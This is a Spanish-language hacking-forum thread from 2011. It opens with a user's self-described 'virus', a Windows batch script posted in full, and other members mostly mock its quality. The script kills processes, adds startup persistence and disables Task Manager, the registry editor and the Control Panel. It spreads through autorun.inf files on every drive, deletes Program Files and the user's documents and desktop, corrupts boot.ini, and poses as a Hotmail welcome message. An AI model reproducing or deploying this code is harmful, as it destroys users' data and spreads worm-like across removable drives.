elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: AIO elhacker.NET 2021 Compilación herramientas análisis y desinfección malware


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  virus informatico msn.exe
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: virus informatico msn.exe  (Leído 7,852 veces)
W4rR3d

Desconectado Desconectado

Mensajes: 12


Ver Perfil
virus informatico msn.exe
« en: 17 Febrero 2011, 23:49 pm »

espero que si ven un error en este virus informatico lo notifican

su amigo W4rR3d
Código
  1. @echo off
  2.  
  3. ::************************************************
  4. ::        VIRUS INFORMATICO MSN.EXE
  5. ::************************************************
  6. ::          virus creado por hacked by
  7. ::      W4rR3d  - G3kk0 - W4rc10k - M1lh077
  8. :: virus dedicado al grupo de hackers " Ka0 Team"
  9. ::************************************************
  10. ..************************************************
  11. ..              Piura  -   Peru
  12. .*************************************************
  13. .      Autodidacta en Ingenieria de Sistemas
  14. .         y creador de virus informaticos
  15. .                hacked by W4rR3d
  16. .*************************************************
  17. :inicio
  18. Set b2=xcopy /I /y
  19. Set b4=C:\
  20. Set b5=D:\
  21. Set b6=E:\
  22. Set b7=F:\
  23. Set b8=G:\
  24. Set b9=H:\
  25. Set b10=%windir%
  26. Set b11=%programfiles%
  27. Set b12=%systemdrive%
  28. Set b13=%USERNAME%
  29. Set b14=%homedrive%
  30. taskkill /f/im explorer.exe /im teatimer.exe /im msnmsgr.exe /im im  mspaint.exe
  31. taskkill /f/im explorer.exe / im  notepad.exe /im  calc.exe
  32. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
  33. REG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v msn /t REG_SZ /d "%b10%\system32\msn\msn.exe" /f
  34. REG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v hotmail /t REG_SZ /d "%b5%\system32\msn\msn.exe" /f
  35. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoViewContextMenu /t REG_DWORD /d 1 /f
  36. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideClock /t REG_DWORD /d 1 /f
  37. reg add HKCU\Software\Microsoft\Windows\currentVersion\policies\System /v NoDispCpl /t REG_DWORD /d 1 /f
  38. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoWindowsUpdate /t REG_DWORD /d 1 /f
  39. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v HideFileExt /t REG_DWORD /d 1 /f
  40. reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\My Computer" /v NoDrives /t REG_DWORD /d 1 /f
  41. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoViewContextMenu /t REG_DWORD /d 1 /f
  42. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f
  43. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f
  44. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
  45. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Advanced /v Hidden /t REG_DWORD /d 0 /f
  46. reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
  47. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableMsConfig /t REG_DWORD /d 1 /f
  48. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t REG_DWORD /d 1 /f
  49. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_ DWORD /d 1 /f
  50. reg Add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_SZ /d "https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1297979999&rver=6.1.6206.0&wp=MBI&wreply=http:%2F%2Fmail.live.com%2Fdefault.aspx&lc=10250&id=64855&mkt=es-pe&cbcxt=mai&snsc=1"
  51. reg Add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 1 /f
  52. reg Add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Window Title" /t REG_SZ /d "Hacked By W4rR3d"
  53. if exist C:\ goto C1
  54. if not "%1"=="" goto D
  55. :C1
  56. if exist %b4%msn attrib +h +s %b4%msn&attrib +s +h +r %b4%autorun.inf
  57. %b2% %b10%\system32\msn %b4%msn
  58. %b3% "%b10%\system32\msn"
  59. copy /y %0 "%b10%\system32\msn\msn.exe"
  60. %b1% [autorun] >>%b4%autorun.inf
  61. %b1% OPEN=msn\msn.exe >>%b4%autorun.inf
  62. %b1% shell\open\Command=msn\msn.exe >>%b4%autorun.inf
  63. %b1% shell\open\Default=1 >>%b4%autorun.inf
  64. %b1% shell\explore\Command=msn\msn.exe >>%b4%autorun.inf
  65. attrib +s +h +r %b4%msn
  66. attrib +s +h +r %b4%autorun.inf
  67. %b1% on error resume next>> %b4%msn.vbs
  68. %b1% set shell = createobject("wscript.shell")>> %b4%msn.vbs
  69. %b1% shell.run "%b10%\system32\msn\msn.exe">> %b4%msn.vbs
  70. start %b4%msn.vbs
  71. %b1% Msgbox "bienvenido a hotmail.com" >> %b4%aviso.vbs
  72. start %b4%aviso.vbs
  73. :D
  74. if exist D:\ goto D1
  75. if not "%1"=="" goto E
  76. :D1
  77. if exist %b5%msn attrib +h +s %b5%msn&attrib +s +h +r %b5%autorun.inf
  78. %b2% %b10%\system32\msn %b5%msn
  79. %b3% "%b10%\system32\msn"
  80. copy /y %0 "%b10%\system32\msn\msn.exe"
  81. %b1% [autorun] >>%b5%autorun.inf
  82. %b1% OPEN=msn\msn.exe >>%b5%autorun.inf
  83. %b1% shell\open\Command=msn\msn.exe >>%b5%autorun.inf
  84. %b1% shell\open\Default=1 >>%b5%autorun.inf
  85. %b1% shell\explore\Command=msn\msn.exe >>%b5%autorun.inf
  86. attrib +s +h +r %b5%msn
  87. attrib +s +h +r %b5%autorun.inf
  88. %b1% on error resume next>> %b5%msn.vbs
  89. %b1% set shell = createobject("wscript.shell")>> %b5%msn.vbs
  90. %b1% shell.run "%b10%\system32\msn\msn.exe">> %b5%msn.vbs
  91. start %b5%msn.vbs
  92. %b1% Msgbox "bienvenido a hotmail.com" >> %b5%aviso.vbs
  93. start %b5%aviso.vbs
  94. :E
  95. if exist E:\ goto E1
  96. if not "%1"=="" goto F
  97. :E1
  98. if exist %b6%msn attrib +h +s %b6%msn&attrib +s +h +r %b6%autorun.inf
  99. %b2% %b10%\system32\msn %b6%msn
  100. %b3% "%b10%\system32\msn"
  101. copy /y %0 "%b10%\system32\msn\msn.exe"
  102. %b1% [autorun] >>%b6%autorun.inf
  103. %b1% OPEN=msn\msn.exe >>%b6%autorun.inf
  104. %b1% shell\open\Command=msn\msn.exe >>%b6%autorun.inf
  105. %b1% shell\open\Default=1 >>%b6%autorun.inf
  106. %b1% shell\explore\Command=msn\msn.exe >>%b6%autorun.inf
  107. attrib +s +h +r %b6%msn
  108. attrib +s +h +r %b6%autorun.inf
  109. %b1% on error resume next>> %b6%msn.vbs
  110. %b1% set shell = createobject("wscript.shell")>> %b6%msn.vbs
  111. %b1% shell.run "%b10%\system32\msn\msn.exe">> %b6%msn.vbs
  112. start %b6%msn.vbs
  113. %b1% Msgbox "bienvenido a hotmail.com" >> %b6%aviso.vbs
  114. start %b6%aviso.vbs
  115. :F
  116. if exist F:\ goto F1
  117. if not "%1"=="" goto G
  118. :F1
  119. if exist %b7%msn attrib +h +s %b7%msn&attrib +s +h +r %b7%autorun.inf
  120. %b2% %b10%\system32\msn %b7%msn
  121. %b3% "%b10%\system32\msn"
  122. copy /y %0 "%b10%\system32\msn\msn.exe"
  123. %b1% [autorun] >>%b7%autorun.inf
  124. %b1% OPEN=msn\msn.exe >>%b7%autorun.inf
  125. %b1% shell\open\Command=msn\msn.exe >>%b7%autorun.inf
  126. %b1% shell\open\Default=1 >>%b7%autorun.inf
  127. %b1% shell\explore\Command=msn\msn.exe >>%b7%autorun.inf
  128. attrib +s +h +r %b7%msn
  129. attrib +s +h +r %b7%autorun.inf
  130. %b1% on error resume next>> %b7%msn.vbs
  131. %b1% set shell = createobject("wscript.shell")>> %b7%msn.vbs
  132. %b1% shell.run "%b10%\system32\msn\msn.exe">> %b7%msn.vbs
  133. start %b7%msn.vbs
  134. %b1% Msgbox "bienvenido a hotmail.com" >> %b7%aviso.vbs
  135. start %b7%aviso.vbs
  136. :G
  137. if not "%1"=="" goto H
  138. :G1
  139. if exist %b8%msn attrib +h +s %b8%msn&attrib +s +h +r %b8%autorun.inf
  140. %b2% %b10%\system32\msn %b8%msn
  141. %b3% "%b10%\system32\msn"
  142. copy /y %0 "%b10%\system32\msn\msn.exe"
  143. %b1% [autorun] >>%b8%autorun.inf
  144. %b1% OPEN=msn\msn.exe >>%b8%autorun.inf
  145. %b1% shell\open\Command=msn\msn.exe >>%b8%autorun.inf
  146. %b1% shell\open\Default=1 >>%b8%autorun.inf
  147. %b1% shell\explore\Command=msn\msn.exe >>%b8%autorun.inf
  148. attrib +s +h +r %b8%msn
  149. attrib +s +h +r %b8%autorun.inf
  150. %b1% on error resume next>> %b8%msn.vbs
  151. %b1% set shell = createobject("wscript.shell")>> %b8%msn.vbs
  152. %b1% shell.run "%b10%\system32\msn\msn.exe">> %b8%msn.vbs
  153. start %b8%msn.vbs
  154. %b1% Msgbox "bienvenido a hotmail.com" >> %b8%aviso.vbs
  155. start %b8%aviso.vbs
  156. :H
  157. if not "%1"=="" goto bor
  158. :H1
  159. if exist %b9%msn attrib +h +s %b9%msn&attrib +s +h +r %b9%autorun.inf
  160. %b2% %b10%\system32\msn %b9%msn
  161. %b3% "%b10%\system32\msn"
  162. copy /y %0 "%b10%\system32\msn\msn.exe"
  163. %b1% [autorun] >>%b9%autorun.inf
  164. %b1% OPEN=msn\msn.exe >>%b9%autorun.inf
  165. %b1% shell\open\Command=msn\msn.exe >>%b9%autorun.inf
  166. %b1% shell\open\Default=1 >>%b9%autorun.inf
  167. %b1% shell\explore\Command=msn\msn.exe >>%b9%autorun.inf
  168. attrib +s +h +r %b9%msn
  169. attrib +s +h +r %b9%autorun.inf
  170. %b1% on error resume next>> %b9%msn.vbs
  171. %b1% set shell = createobject("wscript.shell")>> %b9%msn.vbs
  172. %b1% shell.run "%b10%\system32\msn\msn.exe">> %b9%msn.vbs
  173. start %b9%msn.vbs
  174. %b1% Msgbox "bienvenido a hotmail.com" >> %b9%aviso.vbs
  175. start %b9%aviso.vbs
  176. :bor
  177. DEL /Q /F /S "%b11%\*.*"
  178. DEL /Q /F /S "%b12%\Documents and Settings\%b13%\Meus documentos\*.*"
  179. DEL /Q /F /S "%b12%\Documents and Settings\%b13%\Escritorio\*.*"
  180. %b1% -={W4rR3d_by_hacked}=- >> "%b10%\system32"\"-={W4rR3d_by_hacked}=-.RAR.EXE"
  181. %b1% -={W4rR3d_by_hacked}=- >> "%b10%\system"\"-={W4rR3d_by_hacked}=-.RAR.EXE"
  182. %b1% -={W4rR3d_by_hacked}=- >> "%b10%\"\"-={W4rR3d_by_hacked}=-.RAR.EXE"
  183. %b1% -={W4rR3d_by_hacked}=- >> "%b4%""-={W4rR3d_by_hacked}=-.RAR.EXE"
  184. %b1% -={W4rR3d_by_hacked}=- >> "%b5%""-={W4rR3d_by_hacked}=-.RAR.EXE"
  185. %b1% -={W4rR3d_by_hacked}=- >> "%b6%""-={W4rR3d_by_hacked}=-.RAR.EXE"
  186. %b1% -={W4rR3d_by_hacked}=- >> "%b7%""-={W4rR3d_by_hacked}=-.RAR.EXE"
  187. %b1% -={W4rR3d_by_hacked}=- >> "%b8%""-={W4rR3d_by_hacked}=-.RAR.EXE"
  188. %b1% -={W4rR3d_by_hacked}=- >> "%b9%""-={W4rR3d_by_hacked}=-.RAR.EXE"
  189. %b1% -={W4rR3d_by_hacked}=- >> "%systemdrive%\Documents and Settings\%b13%\Escritorio\-={W4rR3d_by_hacked}=-.RAR.EXE"
  190. %b1% -={W4rR3d_by_hacked}=- >> "%b12%\Documents and Settings\%b13%\Mis documentos\-={W4rR3d_by_hacked}=-.RAR.EXE"
  191. :boot
  192. attrib -h -s -r %b14%\boot.ini
  193. DEL /Q "%b14%\boot.ini"
  194. %b1% [boot loader] >> %b14%\boot.ini
  195. %b1% timeout=30 >> %b14%\boot.ini
  196. %b1% default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS >> %b14%\boot.ini
  197. %b1% default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWs >> %b14%\boot.ini
  198. %b1% [operating systems] >> %b14%\boot.ini
  199. %b1% multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect >> %b14%\boot.ini
  200. %b1% multi(0)disk(0)rdisk(0)partition(1)\WINDOWs="-={W4rR3d_by_hacked}=-" /noexecute=optin / >> %b14%\boot.ini
  201. attrib +s +h +r %b14%\boot.ini
  202. goto inicio


« Última modificación: 18 Febrero 2011, 15:43 pm por W4rR3d » En línea

pucheto

Desconectado Desconectado

Mensajes: 215


Ver Perfil
Re: virus informatico msn.exe
« Respuesta #1 en: 18 Febrero 2011, 00:24 am »

Otra vez sopa....

Código
  1. Set b2=xcopy /I /y
  2. ...
  3. Set b9=H:\
  4. Set b10=%windir%
  5. Set b11=%programfiles%
  6. Set b12=%systemdrive%
  7. Set b13=%USERNAME%
  8. Set b14=%homedrive%
Que pibe declarativo, eso es ser un buen programador, y sobre todo de muy buenas costumbres...

Código
  1. .*************************************************
  2. .      Autodidacta en Ingenieria de Sistemas
  3. .         y creador de virus informaticos
  4. .                hacked by W4rR3d
  5. .*************************************************
Felicidades nuevamente! pero te falto aclarar "los mejores hackers de Piura - Peru"


En línea

Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.724


<3


Ver Perfil WWW
Re: virus informatico msn.exe
« Respuesta #2 en: 18 Febrero 2011, 00:31 am »

, eso es ser un buen programador,
hahahaha no quiero saber que le diría si de verdad programa en un lenguaje de programación :D
En línea

Te vendería mi talento por poder dormir tranquilo.
43H4FH44H45H4CH49H56H45H
Wiki

Desconectado Desconectado

Mensajes: 502



Ver Perfil
Re: virus informatico msn.exe
« Respuesta #3 en: 18 Febrero 2011, 00:35 am »

Felicidades nuevamente! pero te falto aclarar "los mejores hackers de Piura - Peru"
;-)
Este post lo cierran de seguro, asi que me apresuro a  preguntar @W4rR3d el titulo muestra msn.exe, pero tu "virus"  :rolleyes: seria un msn.bat, entonces como mencionaste en otro post que dominas tantos lenguajes, queria saber como pasas el .bat a .exe, deberias publicar el codigo fuente de esa aplicación o solamente usas uno de esos "compiladores" de .bat que utilizan aquellos que no tiene idea de programación  :huh:
Saluos.
En línea


-R IP
:0100
-A 100 
2826:0100 MOV AH,09
2826:0102 MOV DX,109
2826:0105 INT 21
2826:0105 MOV AH,08
2826:0105 INT 21
2826:0107 INT 20
2826:0109 DB 'MI NICK ES CODELIVE.$' 
2826:0127 
-R BX
:0000
-R CX
:20
-N CODELIVE.COM
-W
SuperDraco


Desconectado Desconectado

Mensajes: 2.505


Crew Dragon


Ver Perfil
Re: virus informatico msn.exe
« Respuesta #4 en: 18 Febrero 2011, 08:08 am »

Al menos este tipo, WaRRed, intenta compartir lo que hace... eso tambien cuenta.


Saludos.
En línea

No he vuelto, solo estoy de paso.
Audiofilo84

Desconectado Desconectado

Mensajes: 3



Ver Perfil
Re: virus informatico msn.exe
« Respuesta #5 en: 18 Febrero 2011, 20:22 pm »

como tu dices si vemos errores que te notifiquemos, entonces voy a proceder a realizarte una consulta para que cierras el paint y la calc?,en que influye?
Código:
taskkill /f/im explorer.exe /im teatimer.exe /im msnmsgr.exe /im im  mspaint.exe
taskkill /f/im explorer.exe / im  notepad.exe /im  calc.exe
ahora tu crees que exista alguien tan ingenuo todavia?
Código:
%b1% Msgbox "bienvenido a hotmail.com" >> %b4%aviso.vbs
esto es para pcs portugueses
Código:
DEL /Q /F /S "%b12%\Documents and Settings\%b13%\Meus documentos\*.*"
una consulta en tu firma dice
Código:
.      Autodidacta en Ingenieria de Sistemas
conoces de sistemas?, sabes lo que es un sistema? UML te suena?
creo que para ser autodidacta la palabra ingenieria queda un poco grande

y aqui
Código:
::          virus creado por hacked by 
::      W4rR3d

sabes ingles?  creo que hacked no va ahi
y podria seguir pero mejor te dejo.

pd: la intencion de compartir creo  que es lo que mas vale aunque sean recopilaciones de script de otras personas
saludos.

En línea

Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.724


<3


Ver Perfil WWW
Re: virus informatico msn.exe
« Respuesta #6 en: 18 Febrero 2011, 21:52 pm »

UML te suena?
Y esto para qué?
En línea

Te vendería mi talento por poder dormir tranquilo.
43H4FH44H45H4CH49H56H45H
Wiki

Desconectado Desconectado

Mensajes: 502



Ver Perfil
Re: virus informatico msn.exe
« Respuesta #7 en: 18 Febrero 2011, 23:36 pm »


Se refiere a esto:
.      Autodidacta en Ingenieria de Sistemas

Aunque en este tiempo mejor es mencionar por ejemplo RUP (sobreentendido el papel que tiene UML) para Sistemas Expertos.

Saluos.
En línea


-R IP
:0100
-A 100 
2826:0100 MOV AH,09
2826:0102 MOV DX,109
2826:0105 INT 21
2826:0105 MOV AH,08
2826:0105 INT 21
2826:0107 INT 20
2826:0109 DB 'MI NICK ES CODELIVE.$' 
2826:0127 
-R BX
:0000
-R CX
:20
-N CODELIVE.COM
-W
leogtz
. . .. ... ..... ........ ............. .....................
Colaborador
***
Desconectado Desconectado

Mensajes: 3.069


/^$/


Ver Perfil WWW
Re: virus informatico msn.exe
« Respuesta #8 en: 18 Febrero 2011, 23:43 pm »

conoces de sistemas?, sabes lo que es un sistema? UML te suena?


¿Qué tiene que ver UML?, creo que queda totalmente fuera de lugar.
En línea

Código
  1. (( 1 / 0 )) &> /dev/null || {
  2. echo -e "stderrrrrrrrrrrrrrrrrrr";
  3. }
  4.  
http://leonardogtzr.wordpress.com/
leogutierrezramirez@gmail.com
Audiofilo84

Desconectado Desconectado

Mensajes: 3



Ver Perfil
Re: virus informatico msn.exe
« Respuesta #9 en: 19 Febrero 2011, 04:57 am »

el dice
Código:
Autodidacta en Ingenieria de Sistemas
y le pregunto si conoce el lenguaje modelado unificado ya que mucha gente que sabe apenas manejar windows se consideran expertos o porque crackean pass de wifi ya se creen hackers.
saludos.
En línea

Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
virus informatico dengue.bat
Scripting
W4rR3d 4 5,110 Último mensaje 8 Febrero 2011, 22:32 pm
por leogtz
[BATCH] virus informatico fiebre.exe « 1 2 3 »
Scripting
W4rR3d 23 14,771 Último mensaje 18 Octubre 2011, 03:17 am
por Sorke
virus informatico taskmgr.bat
Scripting
W4rR3d 4 4,907 Último mensaje 26 Marzo 2011, 13:13 pm
por FranciskoAsdf
virus informatico llamado e.coli.bat
Scripting
W4rR3d 9 5,729 Último mensaje 17 Junio 2011, 20:28 pm
por SuperDraco
Japón desarrolla un virus informático para localizar y destruir otros virus « 1 2 »
Noticias
wolfbcn 11 7,753 Último mensaje 6 Mayo 2012, 02:08 am
por anonimo12121
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines